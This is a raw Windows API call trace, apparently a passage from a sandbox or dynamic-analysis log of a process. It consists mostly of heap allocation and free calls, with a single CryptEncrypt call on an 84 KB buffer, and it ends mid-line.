RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0235.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0235.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0235.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0235.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0235.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0235.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0235.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0235.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0235.263] CharLowerBuffW (in: lpsz="byte[84736]", cchLength=0xb | out: lpsz="byte[84736]") returned 0xb [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0235.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0235.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0235.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0235.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0235.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0235.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0235.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.275] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0235.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0235.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0235.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0235.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51388 [0235.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51388, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0235.277] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94e38*, pdwDataLen=0x8cef60*=0x14af9, dwBufLen=0x14b00 | out: pbData=0x2e94e38*, pdwDataLen=0x8cef60*=0x14b00) returned 1 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0235.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0235.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0235.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0235.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0235.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0235.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0235.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0235.292] HeapFree (in: hHeap=0x970000, 